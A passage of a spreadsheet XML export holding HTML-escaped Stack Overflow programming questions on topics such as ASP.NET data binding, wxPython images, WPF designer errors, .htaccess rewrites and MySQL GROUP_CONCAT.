        &amp;lt;uc:FirstNameTextBox runat="server" ID="FirstName" ValidationGroup="Main" Text='&amp;lt;%# Bind("FirstName") %&amp;gt;' /&amp;gt;
    &amp;lt;/InsertItemTemplate&amp;gt;
&amp;lt;/asp:TemplateField&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;After:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:TemplateField HeaderText="First Name:" meta:resourcekey="TemplateFieldResource1"&amp;gt;
    &amp;lt;InsertItemTemplate&amp;gt;
        &amp;lt;uc:FirstNameTextBox runat="server" ID="FirstName" ValidationGroup="Main" /&amp;gt;
    &amp;lt;/InsertItemTemplate&amp;gt;
&amp;lt;/asp:TemplateField&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Edit:  Looks like its just my own UserControls that lose the binding.  I tried adding the Bindable and Localizable(false) attributes to the properties, but that didn't seem to help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Detect failure to load contents of an iframe</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I can detect when the content of an iframe has loaded using the &lt;em&gt;load&lt;/em&gt; event. Unfortunately, for my purposes, there are two problems with this:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;If there is an error loading the page (404/500, etc), the load event is never fired.&lt;/li&gt;
&lt;li&gt;If some images or other dependencies failed to load, the load event is fired as usual.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Is there some way I can reliably determine if either of the above errors occurred?&lt;/p&gt;
&lt;p&gt;I'm writing a semi-web semi-desktop application based on Mozilla/XULRunner, so solutions that only work in Mozilla are welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I create a wx.Image object from in-memory data?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a GUI application in Python using wxPython and I want to display an image in a static control (&lt;code&gt;wx.StaticBitmap&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;I can use &lt;a href="http://www.wxpython.org/docs/api/wx-module.html#ImageFromStream" rel="nofollow"&gt;&lt;code&gt;wx.ImageFromStream&lt;/code&gt;&lt;/a&gt; to load an image from a file, and this works OK:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static_bitmap = wx.StaticBitmap(parent, wx.ID_ANY)
f = open("test.jpg", "rb")
image = wx.ImageFromStream(f)
bitmap = wx.BitmapFromImage(image)
static_bitmap.SetBitmap(bitmap)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But, what I really want to be able to do is create the image from data in memory. So, if I write&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;f = open("test.jpg", "rb")
data = f.read()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;how can I create a &lt;code&gt;wx.Image&lt;/code&gt; object from &lt;code&gt;data&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Thanks for your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting the .NET Framework directory path</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I obtain the .NET Framework directory path inside my C# application?&lt;/p&gt;
&lt;p&gt;The folder that I refer is "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727"&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a Temp Dir in Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Possible Duplicate:&lt;/strong&gt;&lt;br&gt;
  &lt;a href="http://stackoverflow.com/questions/617414/create-a-temporary-directory-in-java"&gt;Create a temporary directory in Java&lt;/a&gt;  &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I have a test for a create DB method and I need a temp directory to put it in. The directory will be removed after the test is done. I tried using &lt;code&gt;File.createTempFile()&lt;/code&gt;, like so:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;tempDir = File.createTempFile("install", "dir");
tempDir.mkdir();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But &lt;code&gt;tempDir&lt;/code&gt; is already exists as a file. How do I create a temp directory as opposed to a file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find frequency of values in an Array or XML (C#)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an XML feed (which I don't control) and I am trying to figure out how to detect the volume of certain attribute values within the document.&lt;/p&gt;
&lt;p&gt;I am also parsing the XML and separating attributes into Arrays (for other functionality) &lt;/p&gt;
&lt;p&gt;Here is a sample of my XML&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;items&amp;gt;
&amp;lt;item att1="ABC123" att2="uID" /&amp;gt;
&amp;lt;item att1="ABC345" att2="uID" /&amp;gt;
&amp;lt;item att1="ABC123" att2="uID" /&amp;gt;
&amp;lt;item att1="ABC678" att2="uID" /&amp;gt;
&amp;lt;item att1="ABC123" att2="uID" /&amp;gt;
&amp;lt;item att1="XYZ123" att2="uID" /&amp;gt;
&amp;lt;item att1="XYZ345" att2="uID" /&amp;gt;
&amp;lt;item att1="XYZ678" att2="uID" /&amp;gt;
&amp;lt;/items&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to find the volume nodes based on each att1 value. Att1 value will change. Once I know the frequency of att1 values I need to pull the att2 value of that node.&lt;/p&gt;
&lt;p&gt;I need to find the TOP 4 items and pull the values of their attributes.&lt;/p&gt;
&lt;p&gt;All of this needs to be done in C# code behind.&lt;/p&gt;
&lt;p&gt;If I was using Javascript I would create an associative array and have att1 be the key  and the frequency be the value. But since I'm new to c# I don't know how to duplicate this in c#.&lt;/p&gt;
&lt;p&gt;So I believe, first I need to find all unique att1 values in the XML. I can do this using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IEnumerable&amp;lt;string&amp;gt; uItems = uItemsArray.Distinct();
// Where uItemsArray is a collection of all the att1 values in an array
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I get stuck on how I compare each unique att1 value to the whole document to get the volume stored in a variable or array or whatever data set. &lt;/p&gt;
&lt;p&gt;Here is the snippet I ended up using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        XDocument doc = XDocument.Load(@"temp/salesData.xml");
        var topItems = from item in doc.Descendants("item")
                    select new
                    {
                        name = (string)item.Attribute("name"),
                        sku = (string)item.Attribute("sku"),
                        iCat = (string)item.Attribute("iCat"),
                        sTime = (string)item.Attribute("sTime"),
                        price = (string)item.Attribute("price"),
                        desc = (string)item.Attribute("desc")
                    } into node
                    group node by node.sku into grp
                    select new { 
                        sku = grp.Key,
                        name = grp.ElementAt(0).name,
                        iCat = grp.ElementAt(0).iCat,
                        sTime = grp.ElementAt(0).sTime,
                        price = grp.ElementAt(0).price,
                        desc = grp.ElementAt(0).desc,
                        Count = grp.Count() 
                    };
        _topSellers = new SalesDataObject[4];
        int topSellerIndex = 0;
        foreach (var item in topItems.OrderByDescending(x =&amp;gt; x.Count).Take(4))
        {
            SalesDataObject topSeller = new SalesDataObject();
            topSeller.iCat = item.iCat;
            topSeller.iName = item.name;
            topSeller.iSku = item.sku;
            topSeller.sTime = Convert.ToDateTime(item.sTime);
            topSeller.iDesc = item.desc;
            topSeller.iPrice = item.price;
            _topSellers.SetValue(topSeller, topSellerIndex);
            topSellerIndex++;
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks for all your help!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox vs IE vs Chrome vs Safari</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently I am designing a website and I am finding it VERY difficult to display the website perfect on ALL browsers. &lt;/p&gt;
&lt;p&gt;Is there any rules, suggestions etc to follow?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NSDictionary with ordered keys</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm curious if this is a situation any other folks have found themselves in.  I have an NSDictionary (stored in a plist) that I'm basically using as an associative array (strings as keys and values).  I want to use the array of keys as part of my application, but I'd like them to be in a specific order (not really an order that I can write an algorithm to sort them into).  I could always store a separate array of the keys, but that seems kind of kludgey because I'd always have to update the keys of the dictionary as well as the values of the array, and make sure they always correspond.  Currently I just use [myDictionary allKeys], but obviously this returns them in an arbitrary, non-guaranteed order.  Is there a data structure in Objective-C that I'm missing?  Does anyone have any suggestions on how to more elegantly do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>RedirectToAction Bug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I Have following code:&lt;/p&gt;
&lt;p&gt;Controller:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public ActionResult Step1()
{
        return View();
}
[AcceptVerbs(HttpVerbs.Post)]
public ActionResult Step1(FormCollection form)
{
        TempData["messageStatus"] = new Random().Next(1, 1000);
        return RedirectToAction("Step1");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;View:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%=TempData["messageStatus"]%&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;in first time in view im getting &lt;strong&gt;12345&lt;/strong&gt; for example, but when i request second time of course i must get something else instead &lt;strong&gt;12345&lt;/strong&gt; for example &lt;strong&gt;54321&lt;/strong&gt; but not, im getting same result &lt;strong&gt;12345&lt;/strong&gt;, how can u explain it? &lt;strong&gt;RedirectToAction&lt;/strong&gt; cache pages?&lt;/p&gt;
&lt;p&gt;where does it mean i must put Guid in my urls for resolving problems with cache? what do u think about this issue?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio fails to deploy report to MSRS</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Visual Studio fails to deploy reports or data sources on remote MSRS instance. Error message is&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Unable to connect to the remote server.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The server is up and running and &lt;code&gt;TargetServerURL&lt;/code&gt; property of the project points to correct url which works in the browser.&lt;/p&gt;
&lt;p&gt;I googled around but and found a few forum threads discussing the same issue but none of them had any relevant resolution. &lt;/p&gt;
&lt;p&gt;I am using &lt;code&gt;VS2008&lt;/code&gt; and &lt;code&gt;MSRS 2008&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Has anyone seen this before? Any ideas how to fix this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hosting user videos</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My client would like website visitors to embed videos in their profiles. We've suggested that we use YouTube for a quick and cost-effective (free) solution. However he is not keen that YouTube would control access to the videos which are an important part of his service. It seems unlikely that YouTube would suddenly pull the plug but to do so would be a very bad look for his business. &lt;/p&gt;
&lt;p&gt;Any recommendations or suggestions for alternative solutions or services? A lot of sites do use YouTube in this way. Do you feel his concerns are valid? &lt;/p&gt;
&lt;p&gt;This is a small business so large upfront development or service costs are out. The website is built in ASP.NET 3.5 using C# and SQL Server 2005.&lt;/p&gt;
&lt;p&gt;Thanks for your time!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a best practice for accessing business logic services in a web app?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a best practice for instantiating / calling business logic layer service in a web app?  I've got a large number services that I keep instantiating and then disposing for just one method call.  &lt;/p&gt;
&lt;p&gt;Should these be implemented as providers? Or maybe accessed from a singleton?&lt;/p&gt;
&lt;p&gt;Example code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void ShipProduct(){
  ProductService service = new ProductService();
  service.Ship(aProduct);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Obviously it's a lot more complicated than that, I just don't know if I'm doing something wrong by creating new instances of these services everywhere.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>powershell command to restore remote database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know the powershell commands to restore a remote database from a local file?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET - Ajax requests with jQuery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got this textBox which triggers off an ajax request using jQuery:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:TextBox ID="postcodeTextBox" runat="server" Text='&amp;lt;%# Bind("POSTAL_ZIP_CODE") %&amp;gt;'&amp;gt;
$(document).ready(PageLoad);
function PageLoad() {
    $(container + 'parentProjectTextBox').change(GetProjectName);
}
function GetProjectName() {
    var projectNumber = $(this).val();
    if (projectNumber == '') return;
    $(container + 'parentProjectPanel').block({ message: '&amp;lt;img src="../Resources/RadControls/Ajax/Skins/Default/loading7.gif" /&amp;gt;' });
    $.ajax({
        type: 'POST',
        url: projectMasterWebServicesUrl + 'GetProjectName',
        data: "{'projectNumber':'" + projectNumber + "'}",
        contentType: 'application/json; charset=utf-8',
        dataType: 'json',
        success: GetProjectNameOnSuccess,
        error: GetProjectNameOnError
    });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This ajax request gets a list to populate this dropdown:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;                        &amp;lt;asp:DropDownList ID="cityDropDownList" runat="server" OnDataBound="cityDropDownList_DataBound"&amp;gt;
                            &amp;lt;asp:ListItem Text="...Select..." Value="0"&amp;gt;
                            &amp;lt;/asp:ListItem&amp;gt;
                        &amp;lt;/asp:DropDownList&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Everything works fine. The only problem I'm having is that when I update my formView priod to saving that record I can't see the value that was set to that dropdown. As I'm populating this dropdown in the client side I supose ASP.NET loses track of that ....&lt;/p&gt;
&lt;p&gt;Does anyone have any insights?&lt;/p&gt;
&lt;p&gt;Apparently when I switch on/off the EnableEventValidation property for that page I sometimes get the correct value.....&lt;/p&gt;
&lt;p&gt;Thanks !&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Trailing/leading zero count for a byte</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Java and I'm coding a chess engine.&lt;/p&gt;
&lt;p&gt;I'm trying to find the index of the first 1 bit and the index of the last 1 bit in a byte.&lt;/p&gt;
&lt;p&gt;I'm currently using Long.numberOfTrailingZeros() (or something like that) in Java, and would like to emulate that functionality, except with bytes.&lt;/p&gt;
&lt;p&gt;Would it be something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;byte b = 0b011000101;
int firstOneBit = bitCount ((b &amp;amp; -b) - 1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If so, how would I implement bitCount relatively efficiently.  I don't mind good explainations, please don't just give me code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I add a context menu to a ListBoxItem?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a ListBox and I want to add a context menu to each item in the list. I've seen the "solution" to have the right click select an item and suppress the context menu if on white space, but this solution feels dirty. &lt;/p&gt;
&lt;p&gt;Does anyone know a better way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the easiest way to detect compilation failures, missing packages, etc in a Perl application?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Perl application someone else wrote and I'm trying to make it run on my local machine. But I keep getting an error in one of the modules, which appears to be based on a missing module somewhere. What are some good tools or practices to track this thing down?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>need help-variable creation in Python (continuation)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/374572/need-help-variable-creation-in-python#374604"&gt;That&lt;/a&gt; was helpful kgiannakakis.
I'm facing a problem as below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;a = ['zbc','2.3']
for i in range(0,5):
    exec('E%d=%s' %(i,a[i]))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This results in:&lt;/p&gt;
&lt;pre&gt;
Traceback (most recent call last):
  File "", line 2, in 
    exec('E%d=%s' %(i,a[i]))
  File "", line 1, in 
NameError: name 'zbc' is not defined
&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>DevExpress ASP.Net Component on Mono</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a happy user of DevExpress components, though currently I'm still on a linux web host. &lt;/p&gt;
&lt;p&gt;In another thread I've spoken about my plans to move to a Windows environment so that I can use DevExpress's ASP.Net components. For some time now DevExpress's stand has been that their components is not likely to work on Mono, due to heavy usage of P/Invoke. &lt;/p&gt;
&lt;p&gt;Having no prior experience with their ASP.Net components, my question is, has anyone successfully used their ASP.Net controls under Mono? I've read some posts that indicated that they had much better luck with ASP.Net stuff under mono than WinForms stuff.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight Datagrid: Changing cell styles, based on values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some data. I want to go through that data and change cells (for example - Background color), if that data meets a certain condition. Somehow, I've not been able to figure it out how to do this seemingly easy thing in Silverlight.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.htaccess - Rule being ignored</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use this line in my .htaccess file to automatically add a trailing slash if not present&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rewriteRule ^(([a-z0-9\-]+/)*[a-z0-9\-]+)$ /$1/ [NC,R=301]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works fine, until I use these lines to redirect all requests to not files or dirs to index.php&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . index.php
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This now forwards the page, but doesn't add the trailing slash.&lt;/p&gt;
&lt;p&gt;Does anyone know why this wouldn't be working?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Newest Microsoft Chart and ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Recently ASP.NET developer launched its newest control, Charting control. (&lt;a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=130f7986-bf49-4fe5-9ca8-910ae6ea442c&amp;amp;DisplayLang=en" rel="nofollow"&gt;Microsoft Chart&lt;/a&gt;). Does this compatible with ASP.NET MVC, or its only compatible with ASP.NET WebForm ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inversion of Control in Compilers</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone out there actually used inversion of control containers &lt;em&gt;within&lt;/em&gt; compiler implementations yet? I know that by design, compilers need to be very fast, but I've always been curious about how IoC/DI could affect the construction of a programming language--hot-swappable syntaxes, anyone?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is Catalyst+Mason+Template::Toolkit worth learning rather than sticking to LAMP+Axkit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Currently i'm using pretty much Unix + Mysql + Perl + Apache with some javascript to make it more ajax like. and i've been looking at sites which are web 2.0 and stackoverflow and really like the simple design and the smooth flow from pages and action, etc.&lt;/p&gt;
&lt;p&gt;i'm trying to decide if learning catalyst, mason and the likes are going to be able to provide me with the capability to build powerful and smooth web 2.0 website with less effort and easier and cleaner code to maintain later.&lt;/p&gt;
&lt;p&gt;as of right now, i don't really like the website that i built as it's pretty much stale and slow. but &lt;a href="http://stackoverflow.com/questions/105226/is-perl-still-a-viable-language-for-web-development"&gt;i've read from here&lt;/a&gt; that if i want to build a career out of it, then LAMP would be a better choice?&lt;/p&gt;
&lt;p&gt;just wondering in terms of these three criterias, what would be my best step forward?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;career development&lt;/li&gt;
&lt;li&gt;ease of building powerful web 2.0 websites&lt;/li&gt;
&lt;li&gt;in what way is the Catalyst actually better than LAMP?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;thanks.
~steve&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JBPM Workflow patch generation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been using JBPM workflow in my project and I have a small question regarding generating the database patches or SQL statements to apply JBPM workflow modifications. &lt;/p&gt;
&lt;p&gt;Currently JBPM workflow provides a way to refresh the JBPM tables in schema with the deployment of the latest process definitions. However what if my system is already live with process definition deployed with state X and now I have modified the process definition file to accommodate change X2. I still need to be able to deploy the delta changes without disrupting the instances of old saved data.&lt;/p&gt;
&lt;p&gt;Is it possible to generate only "delta" database scripts for the JBPM process definition modification? And what are other good tools which can be used to modify process definitions more intuitively? &lt;/p&gt;
&lt;p&gt;To reiterate on my problem, JBPM deploy cleans the JBPM tables of old instances maintained there and then redeploys the latest files; how do I generate the delta without deleting old data? Are there any user friendly tools for that?&lt;/p&gt;
&lt;p&gt;Any help in this regard will be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WPF Designer has bug with parsing generic control with overrided property</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've created a generic lookless control with virtual property:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public abstract class TestControlBase&amp;lt;TValue&amp;gt; : Control
{
    public static readonly DependencyProperty ValueProperty;
    static TestControlBase()
    {
        ValueProperty = DependencyProperty.Register("Value", typeof(TValue),
                                                    typeof(TestControlBase&amp;lt;TValue&amp;gt;));
    }
    protected TestControlBase()
    {
        Focusable = false;
        Value = default(TValue);
    }
    public virtual TValue Value
    {
        get
        {
            return (TValue)GetValue(ValueProperty);
        }
        set
        {
            SetValue(ValueProperty, value);
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I've made a control derived from it and overrided Value property:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class TestControl : TestControlBase&amp;lt;int&amp;gt;
{
    public override int Value
    {
        get
        {
            return base.Value;
        }
        set
        {
            base.Value = value;
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So I use it in a Window XAML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;TestControls:TestControl /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I open window in designer all is OK, but when I put mouse cursor to this line, or to this control in designer I receive exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Exception has been thrown by the target of an invocation.
   at System.RuntimeMethodHandle._InvokeMethodFast(Object target, Object[] arguments, SignatureStruct&amp;amp; sig, MethodAttributes methodAttributes, RuntimeTypeHandle typeOwner)
   at System.RuntimeMethodHandle.InvokeMethodFast(Object target, Object[] arguments, Signature sig, MethodAttributes methodAttributes, RuntimeTypeHandle typeOwner)
   at System.Reflection.RuntimeMethodInfo.Invoke(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean skipVisibilityChecks)
   at System.Delegate.DynamicInvokeImpl(Object[] args)
   at System.Windows.Threading.ExceptionWrapper.InternalRealCall(Delegate callback, Object args, Boolean isSingleParameter)
   at System.Windows.Threading.ExceptionWrapper.TryCatchWhen(Object source, Delegate callback, Object args, Boolean isSingleParameter, Delegate catchHandler)
Ambiguous match found.
   at System.RuntimeType.GetPropertyImpl(String name, BindingFlags bindingAttr, Binder binder, Type returnType, Type[] types, ParameterModifier[] modifiers)
   at System.Type.GetProperty(String name)
   at MS.Internal.ComponentModel.DependencyPropertyKind.get_IsDirect()
   at MS.Internal.ComponentModel.DependencyPropertyKind.get_IsAttached()
   at MS.Internal.ComponentModel.APCustomTypeDescriptor.GetProperties(Attribute[] attributes)
   at MS.Internal.ComponentModel.APCustomTypeDescriptor.GetProperties()
   at System.ComponentModel.TypeDescriptor.TypeDescriptionNode.DefaultExtendedTypeDescriptor.System.ComponentModel.ICustomTypeDescriptor.GetProperties()
   at System.ComponentModel.TypeDescriptor.GetPropertiesImpl(Object component, Attribute[] attributes, Boolean noCustomTypeDesc, Boolean noAttributes)
   at System.ComponentModel.TypeDescriptor.GetProperties(Object component)
   at MS.Internal.Model.ModelPropertyCollectionImpl.GetProperties(String propertyNameHint)
   at MS.Internal.Model.ModelPropertyCollectionImpl.&amp;lt;GetEnumerator&amp;gt;d__0.MoveNext()
   at MS.Internal.Designer.PropertyEditing.Model.ModelPropertyMerger.&amp;lt;GetFirstProperties&amp;gt;d__0.MoveNext()
   at MS.Internal.Designer.PropertyEditing.PropertyInspector.UpdateCategories(Selection selection)
   at MS.Internal.Designer.PropertyEditing.PropertyInspector.OnSelectionChangedIdle()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Who know this problem? Please explain :) I have no ideas except that WPF Designer doesn't like generics. If I replace generics by &lt;code&gt;Object&lt;/code&gt; all is OK.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Linq to Entities / Entity Framework cross edmx "join"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two entities, each from a different database and therefore different edmx files. There is, however, an infered relationship between them.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Foo&lt;/code&gt; has many &lt;code&gt;Bar&lt;/code&gt;s for example.&lt;/p&gt;
&lt;p&gt;What's the easiest way to do this join in the EntityFramework, with fewest database calls?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Access Report PageHeader not with GroupHeader</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm stuck with the following:&lt;/p&gt;
&lt;p&gt;I have an Access2003 report "rptInvoices". 
Group levels are on CustomerID and PackingListID. &lt;/p&gt;
&lt;p&gt;What I like to achieve is that every 2nd (or 3rd etc.) page of an invoice starts with a blank section (of say 9cm) at the top of the page. For this I would use an empty PageHeader section. If the Report's property PageHeader had a value like NotWithGroupHeaderX, this would be easy. &lt;/p&gt;
&lt;p&gt;Since there isn't such a value: how can I hide the PageHeader on a report if there's a GroupHeader named grhCustomerID on that page?&lt;/p&gt;
&lt;p&gt;Maybe I need a different approach, but I just don't see it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC framework for huge Java EE application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Which MVC-framework is the best option (performance/ease of development) for a web application, that will have + 2 million visits per week.&lt;/p&gt;
&lt;p&gt;Basically the site is a search engine,but also there will be large amounts of XML parsing, and high db traffic.&lt;/p&gt;
&lt;p&gt;We are using Java, over Jboss 4.2.3x, with PG as DB, and Solr for the searches.&lt;/p&gt;
&lt;p&gt;We were thinking on code JSPs with taglibs, and Servlets, but we were feeling like there would be a better alternative, which don't know yet, as we are starting on the Java Web applications world.&lt;/p&gt;
&lt;p&gt;Any opinions, and shares of your experience will be appreciated!&lt;br&gt;
Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I animate a static object in a WPF storyboard</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a WPF program to which I need to add a "Demo mode". Since I want my designers to be able to modify the demo mode without me having to recompile the program each time, I tough it would be a great idea to use a storyboard from an external XAML file. The "Demo mode" is basically a storyboard animating some of the application's dependency properties.&lt;/p&gt;
&lt;p&gt;To expose my application's DPs, I have created a public static member (singleton) of the application's class so that the application's DPs are always available externally. In this case, the storyboard will be accessing them.&lt;/p&gt;
&lt;p&gt;In the external XAML file, I have added the proper xmlns referencing correctly the application's namespace/assembly. So in theory, I should be able to access the application's DP in a Storyboard.&lt;/p&gt;
&lt;p&gt;The problem is that I don't know how to animate a DP of a static object in a Storyboard when the object is not declared/named in the XAML. When declaring a storyboard animation frame, the only storyboard's attached property are &lt;em&gt;Storyboard.TargetName&lt;/em&gt; and &lt;em&gt;Storyboard.TargetProperty&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;I would appreciate if someone could give me a hint to get me in the right direction.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to truncate and shrink log files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to truncate and shrink large log files in SQL Server 2005? How to apply truncation at regular intervals?&lt;/p&gt;
&lt;p&gt;Is there any difference between truncation and shrinking?&lt;/p&gt;
&lt;p&gt;Thanks in advance&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using GROUP_CONCAT on subquery in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a MySQL query in which I want to include a list of ID's from another table. On the website, people are able to add certain items, and people can then add those items to their favourites. I basically want to get the list of ID's of people who have favourited that item (this is a bit simplified, but this is what it boils down to).&lt;/p&gt;
&lt;p&gt;Basically, I do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT *,
GROUP_CONCAT((SELECT userid FROM favourites WHERE itemid = items.id) SEPARATOR ',') AS idlist
FROM items
WHERE id = $someid
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This way, I would be able to show who favourited some item, by splitting the idlist later on to an array in PHP further on in my code, however I am getting the following MySQL error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;em&gt;1242 - Subquery returns more than 1 row&lt;/em&gt; &lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I thought that was kind of the point of using &lt;code&gt;GROUP_CONCAT&lt;/code&gt; instead of, for example, &lt;code&gt;CONCAT&lt;/code&gt;? Am I going about this the wrong way?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Ok, thanks for the answers so far, that seems to work. However, there is a catch. Items are also considered to be a favourite if it was added by that user. So I would need an additional check to check if creator = userid. Can someone help me come up with a smart (and hopefully efficient) way to do this?&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
&lt;p&gt;Edit: I just tried to do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT [...] LEFT JOIN favourites ON (userid = itemid OR creator = userid)
&lt;/code&gt;&lt;/pre&gt;
